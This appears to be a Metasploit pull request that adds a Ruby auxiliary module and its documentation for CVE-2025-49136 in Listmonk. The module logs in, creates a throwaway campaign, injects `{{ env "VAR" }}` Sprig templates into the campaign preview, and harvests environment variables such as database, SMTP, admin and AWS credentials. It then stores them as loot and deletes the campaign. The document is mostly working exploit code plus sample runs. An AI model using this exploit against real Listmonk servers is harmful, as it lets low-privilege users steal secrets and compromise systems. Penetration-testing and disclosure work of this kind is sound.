### PR TITLE
Add Listmonk Template Function Environment Variable Disclosure Auxiliary Module (CVE-2025-49136)

### DIFF
--- a/documentation/modules/auxiliary/gather/listmonk_env_disclosure.md
+++ b/documentation/modules/auxiliary/gather/listmonk_env_disclosure.md
@@ -1,0 +1,178 @@
+## Vulnerable Application
+
+This module exploits insecure Sprig template functions in Listmonk versions >= v4.0.0 and < v5.0.2.
+The `env` and `expandenv` functions are enabled by default in campaign templates, allowing
+authenticated users with minimal campaign permissions to extract sensitive environment variables
+through the campaign preview functionality.
+
+Listmonk is a self-hosted newsletter and mailing list manager. Environment variables in
+Listmonk deployments often contain sensitive information such as database credentials,
+SMTP passwords, API keys, and admin credentials.
+
+### Required Privileges
+
+For this exploit to work, the authenticated user must have the following privileges:
+- `campaigns:get` - Permission to get and view campaigns belonging to permitted lists
+- `campaigns:get_all` - Permission to get and view campaigns across all lists
+
+These are minimal privileges that can be assigned to non-admin users in multi-user Listmonk
+installations, making this vulnerability particularly dangerous as it allows privilege escalation
+through environment variable disclosure.
+
+#### Docker Installation (Vulnerable Version)
+
+To install the vulnerable version, run the following command :
+
+```
+curl -LO https://github.com/knadh/listmonk/raw/master/docker-compose.yml
+sed -i 's|image: listmonk/listmonk:latest|image: listmonk/listmonk:v5.0.1|' docker-compose.yml
+docker compose up
+```
+
+#### Vulnerable Versions
+
+- Listmonk >= v4.0.0 and < v5.0.2
+
+#### Patched Versions
+
+- Listmonk >= v5.0.2
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/gather/listmonk_env_disclosure`
+3. Do: `set RHOSTS [target]`
+4. Do: `set USERNAME [username]`
+5. Do: `set PASSWORD [password]`
+6. Optional: `set ENVVAR [comma-separated environment variables]`
+7. Do: `run`
+8. You should see extracted environment variable values
+
+## Options
+
+### USERNAME
+
+The Listmonk username for authentication. This must be a valid user account with
+the required `campaigns:get` and `campaigns:get_all` permissions.
+
+### PASSWORD
+
+The Listmonk password for authentication.
+
+### ENVVAR
+
+A comma-separated list of environment variable names to extract. If not specified,
+the module will automatically attempt to extract a default list of common sensitive
+environment variables.
+
+**Default variables extracted (when ENVVAR is not set):**
+- `LISTMONK_db__host` - Database host
+- `LISTMONK_db__port` - Database port
+- `LISTMONK_db__user` - Database username
+- `LISTMONK_db__password` - Database password
+- `LISTMONK_db__database` - Database name
+- `LISTMONK_app__address` - Application address
+
+**Examples of custom variables to target:**
+- `LISTMONK_app__admin_username`, `LISTMONK_app__admin_password` - Admin credentials
+- `SMTP_HOST`, `SMTP_PORT`, `SMTP_USER`, `SMTP_PASSWORD` - Email server credentials
+- `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` - Cloud provider credentials
+- `DATABASE_URL`, `REDIS_URL` - Connection strings
+- `SECRET_KEY`, `API_KEY` - Application secrets
+- `PATH`, `HOME`, `USER` - System environment variables
+
+### CAMPAIGN_NAME
+
+Optional campaign name to use for the temporary campaign created during extraction.
+If not specified, a random name will be generated to avoid collisions when running
+the module multiple times. The campaign is automatically deleted after extraction.
+
+## Scenarios
+
+### Running Check to Verify Target is Vulnerable
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
+PASSWORD => adminadmin
+msf6 auxiliary(gather/listmonk_env_disclosure) > check
+
+[*] 192.168.1.100:9000 - The target appears to be vulnerable. Listmonk version 5.0.1 is vulnerable
+```
+
+### Extract Default Environment Variables
+
+Running the module without specifying ENVVAR will automatically extract the default
+list of common Listmonk environment variables:
+
+```
+msf6 > use auxiliary/gather/listmonk_env_disclosure
+msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
+PASSWORD => adminadmin
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Using default environment variable list (6 variables)
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+LISTMONK_db__host: localhost
+LISTMONK_db__port: 5432
+LISTMONK_db__user: listmonk_user
+LISTMONK_db__password: my_secure_db_password123
+LISTMONK_db__database: listmonk
+LISTMONK_app__address: 0.0.0.0:9000
+
+[*] Auxiliary module execution completed
+```
+
+### Extract Specific Environment Variables
+
+You can target specific environment variables by providing a comma-separated list:
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
+ENVVAR => LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Targeting specific environment variables: LISTMONK_db__password, LISTMONK_app__admin_password, SMTP_PASSWORD
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+LISTMONK_db__password: my_secure_db_password123
+LISTMONK_app__admin_password: admin_secret_password
+SMTP_PASSWORD: smtp_pass_2024
+
+[*] Auxiliary module execution completed
+```
+
+### Extract Single Environment Variable
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR PATH
+ENVVAR => PATH
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Targeting specific environment variables: PATH
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/listmonk_env_disclosure.rb
+++ b/modules/auxiliary/gather/listmonk_env_disclosure.rb
@@ -1,0 +1,258 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Listmonk Insecure Sprig Template Functions Environment Disclosure',
+        'Description' => %q{
+          This module exploits insecure Sprig template functions in Listmonk
+          versions prior to v5.0.2. The env and expandenv functions are enabled
+          by default, allowing authenticated users with campaign permissions to
+          extract sensitive environment variables via campaign preview.
+        },
+        'Author' => ['Tarek Nakkouch'],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-49136'],
+          ['URL', 'https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h']
+        ],
+        'DisclosureDate' => '2025-06-08',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(9000),
+      OptString.new('TARGETURI', [true, 'Base path to Listmonk', '/']),
+      OptString.new('USERNAME', [true, 'Listmonk username']),
+      OptString.new('PASSWORD', [true, 'Listmonk password']),
+      OptString.new('ENVVAR', [false, 'Comma-separated list of environment variables to read (uses default list if not set)']),
+      OptString.new('CAMPAIGN_NAME', [false, 'Campaign name (random if not set)'])
+    ])
+  end
+
+  def check
+    begin
+      login
+    rescue Msf::Exploit::Failed
+      return Msf::Exploit::CheckCode::Unknown('Authentication failed')
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'about')
+    })
+
+    return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res
+
+    if res.code == 200
+      json = res.get_json_document
+      return Msf::Exploit::CheckCode::Unknown('Failed to parse version information') unless json
+
+      if json['version']
+        version_string = json['version'].gsub(/^v/, '')
+        version = Rex::Version.new(version_string)
+        if version >= Rex::Version.new('4.0.0') && version < Rex::Version.new('5.0.2')
+          return Msf::Exploit::CheckCode::Appears("Listmonk version #{version_string} is vulnerable")
+        else
+          return Msf::Exploit::CheckCode::Safe("Listmonk version #{version_string} is patched")
+        end
+      end
+    end
+
+    Msf::Exploit::CheckCode::Unknown('Could not determine if target is running Listmonk')
+  end
+
+  def get_nonce
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login')
+    })
+
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+
+    html = res.get_html_document
+    fail_with(Failure::UnexpectedReply, 'Could not parse HTML login page') unless html
+
+    nonce = html.at('input[@name="nonce"]/@value')
+    fail_with(Failure::UnexpectedReply, 'Could not extract nonce from login page') unless nonce
+
+    nonce.text
+  end
+
+  def login
+    nonce = get_nonce
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'nonce' => nonce,
+        'next' => '/admin',
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+
+    fail_with(Failure::Unreachable, 'Connection failed during login') unless res
+
+    if res.code == 302
+      print_good('Login successful')
+    else
+      fail_with(Failure::NoAccess, "Login failed with code #{res.code}")
+    end
+  end
+
+  def create_campaign
+    # Use random campaign name to avoid collisions on re-runs and reduce fingerprinting
+    campaign_name = datastore['CAMPAIGN_NAME'] || Rex::Text.rand_text_alpha(8..12)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'campaigns'),
+      'ctype' => 'application/json',
+      'data' => {
+        'archiveSlug' => campaign_name,
+        'name' => campaign_name,
+        'subject' => campaign_name,
+        'lists' => [1],
+        'from_email' => 'listmonk <noreply@listmonk.yoursite.com>',
+        'content_type' => 'richtext',
+        'messenger' => 'email',
+        'type' => 'regular',
+        'tags' => [],
+        'send_at' => nil,
+        'headers' => [],
+        'media' => []
+      }.to_json
+    })
+
+    fail_with(Failure::Unreachable, 'Connection failed during campaign creation') unless res
+
+    if res.code == 200
+      parsed = res.get_json_document
+      fail_with(Failure::UnexpectedReply, 'Failed to parse campaign creation response') unless parsed
+
+      campaign_id = parsed['data']['id']
+      vprint_status("Campaign created with ID: #{campaign_id}")
+      return campaign_id
+    else
+      fail_with(Failure::Unknown, "Failed to create campaign: #{res.code}")
+    end
+  end
+
+  def preview_campaign(campaign_id, payload)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'campaigns', campaign_id.to_s, 'preview'),
+      'vars_post' => {
+        'template_id' => '1',
+        'content_type' => 'richtext',
+        'body' => payload
+      }
+    })
+
+    fail_with(Failure::Unreachable, 'Connection failed during preview') unless res
+
+    fail_with(Failure::Unknown, "Preview failed with code: #{res.code}") unless res.code == 200
+    extract_results(res.body)
+  end
+
+  def default_env_vars
+    [
+      'LISTMONK_db__host',
+      'LISTMONK_db__port',
+      'LISTMONK_db__user',
+      'LISTMONK_db__password',
+      'LISTMONK_db__database',
+      'LISTMONK_app__address'
+    ]
+  end
+
+  def delete_campaign(campaign_id)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'api', 'campaigns', campaign_id.to_s)
+    })
+
+    if res && res.code == 200
+      vprint_good("Campaign #{campaign_id} deleted successfully")
+    else
+      print_warning("Failed to delete campaign #{campaign_id}")
+    end
+  end
+
+  def extract_results(html)
+    doc = Nokogiri::HTML(html)
+    wrap_div = doc.at('div[@class="wrap"]')
+    fail_with(Failure::UnexpectedReply, 'Could not find wrap div in response') unless wrap_div
+
+    paragraphs = wrap_div.search('p').map(&:text).map(&:strip).reject(&:empty?)
+
+    if paragraphs.any?
+      print_good('Environment variable(s) extracted:')
+      print_line('')
+      paragraphs.each do |result|
+        print_line(result.to_s)
+      end
+
+      loot_data = paragraphs.join("\n")
+      store_loot(
+        'listmonk.env',
+        'text/plain',
+        rhost,
+        loot_data,
+        'listmonk_env_disclosure.txt',
+        'Listmonk Environment Variables'
+      )
+      print_line('')
+
+      return paragraphs
+    else
+      print_error('No results found in response')
+      return []
+    end
+  end
+
+  def run
+    print_status("Targeting #{full_uri}")
+
+    # Determine which environment variables to extract
+    if datastore['ENVVAR']
+      env_vars = datastore['ENVVAR'].split(',').map(&:strip)
+      print_status("Targeting specific environment variables: #{env_vars.join(', ')}")
+    else
+      env_vars = default_env_vars
+      print_status("Using default environment variable list (#{env_vars.length} variables)")
+    end
+
+    # Build payload with all environment variables
+    payload_parts = env_vars.map do |var|
+      "<p>#{var}: {{ env \"#{var}\" }}</p>"
+    end
+    payload = payload_parts.join
+
+    login
+
+    begin
+      campaign_id = create_campaign
+      print_status('Executing template to extract environment variables...')
+      preview_campaign(campaign_id, payload)
+    ensure
+      # Clean up by deleting the campaign even if extraction fails
+      delete_campaign(campaign_id) if campaign_id
+    end
+  end
+end


### PR DESCRIPTION
## Description

This PR adds an auxiliary scanner module for an insecure template function vulnerability in in Listmonk versions >= v4.0.0 and < v5.0.2.. The issue exists in the campaign preview functionality, where dangerous Sprig template functions (`env` and `expandenv`) are enabled by default. This allows authenticated users with minimal campaign permissions (`campaigns:get` and `campaigns:get_all`) to read arbitrary environment variables on the host system through campaign template previews. Environment variables in Listmonk deployments often contain sensitive information such as database credentials, SMTP passwords, API keys, and admin credentials, leading to potential full system compromise.

### Required Privileges

For this exploit to work, the authenticated user must have the following privileges:
- `campaigns:get` - Permission to get and view campaigns belonging to permitted lists
- `campaigns:get_all` - Permission to get and view campaigns across all lists

These are minimal privileges that can be assigned to non-admin users in multi-user Listmonk
installations, making this vulnerability particularly dangerous as it allows privilege escalation
through environment variable disclosure.

#### Docker Installation (Vulnerable Version)

To install the vulnerable version, run the following command :

```
curl -LO https://github.com/knadh/listmonk/raw/master/docker-compose.yml
sed -i 's|image: listmonk/listmonk:latest|image: listmonk/listmonk:v5.0.1|' docker-compose.yml
docker compose up
```

#### Vulnerable Versions

- Listmonk >= v4.0.0 and < v5.0.2

#### Patched Versions

- Listmonk >= v5.0.2

## Verification Steps

1. Start msfconsole
2. Do: `use auxiliary/gather/listmonk_env_disclosure`
3. Do: `set RHOSTS [target]`
4. Do: `set USERNAME [username]`
5. Do: `set PASSWORD [password]`
6. Optional: `set ENVVAR [comma-separated environment variables]`
7. Do: `run`
8. You should see extracted environment variable values

## Options

### USERNAME

The Listmonk username for authentication. This must be a valid user account with
the required `campaigns:get` and `campaigns:get_all` permissions.

### PASSWORD

The Listmonk password for authentication.

### ENVVAR

A comma-separated list of environment variable names to extract. If not specified,
the module will automatically attempt to extract a default list of common sensitive
environment variables.

**Default variables extracted (when ENVVAR is not set):**
- `LISTMONK_db__host` - Database host
- `LISTMONK_db__port` - Database port
- `LISTMONK_db__user` - Database username
- `LISTMONK_db__password` - Database password
- `LISTMONK_db__database` - Database name
- `LISTMONK_app__address` - Application address

**Examples of custom variables to target:**
- `LISTMONK_app__admin_username`, `LISTMONK_app__admin_password` - Admin credentials
- `SMTP_HOST`, `SMTP_PORT`, `SMTP_USER`, `SMTP_PASSWORD` - Email server credentials
- `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` - Cloud provider credentials
- `DATABASE_URL`, `REDIS_URL` - Connection strings
- `SECRET_KEY`, `API_KEY` - Application secrets
- `PATH`, `HOME`, `USER` - System environment variables

### CAMPAIGN_NAME

Optional campaign name to use for the temporary campaign created during extraction.
If not specified, a random name will be generated to avoid collisions when running
the module multiple times. The campaign is automatically deleted after extraction.

## Scenarios

### Running Check to Verify Target is Vulnerable

```
msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
PASSWORD => adminadmin
msf6 auxiliary(gather/listmonk_env_disclosure) > check

[*] 192.168.1.100:9000 - The target appears to be vulnerable. Listmonk version 5.0.1 is vulnerable
```

### Extract Default Environment Variables

Running the module without specifying ENVVAR will automatically extract the default
list of common Listmonk environment variables:

```
msf6 > use auxiliary/gather/listmonk_env_disclosure
msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
PASSWORD => adminadmin
msf6 auxiliary(gather/listmonk_env_disclosure) > run

[*] Running module against 127.0.0.1
[*] Targeting http://127.0.0.1:9000/
[+] Login successful
[*] Using default environment variable list (6 variables)
[*] Executing template to extract environment variables...
[+] Environment variable(s) extracted:

LISTMONK_db__host: localhost
LISTMONK_db__port: 5432
LISTMONK_db__user: listmonk_user
LISTMONK_db__password: my_secure_db_password123
LISTMONK_db__database: listmonk
LISTMONK_app__address: 0.0.0.0:9000

[*] Auxiliary module execution completed
```

### Extract Specific Environment Variables

You can target specific environment variables by providing a comma-separated list:

```
msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
ENVVAR => LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
msf6 auxiliary(gather/listmonk_env_disclosure) > run

[*] Running module against 127.0.0.1
[*] Targeting http://127.0.0.1:9000/
[+] Login successful
[*] Targeting specific environment variables: LISTMONK_db__password, LISTMONK_app__admin_password, SMTP_PASSWORD
[*] Executing template to extract environment variables...
[+] Environment variable(s) extracted:

LISTMONK_db__password: my_secure_db_password123
LISTMONK_app__admin_password: admin_secret_password
SMTP_PASSWORD: smtp_pass_2024

[*] Auxiliary module execution completed
```

### Extract Single Environment Variable

```
msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR PATH
ENVVAR => PATH
msf6 auxiliary(gather/listmonk_env_disclosure) > run

[*] Running module against 127.0.0.1
[*] Targeting http://127.0.0.1:9000/
[+] Login successful
[*] Targeting specific environment variables: PATH
[*] Executing template to extract environment variables...
[+] Environment variable(s) extracted:

PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[*] Auxiliary module execution completed
```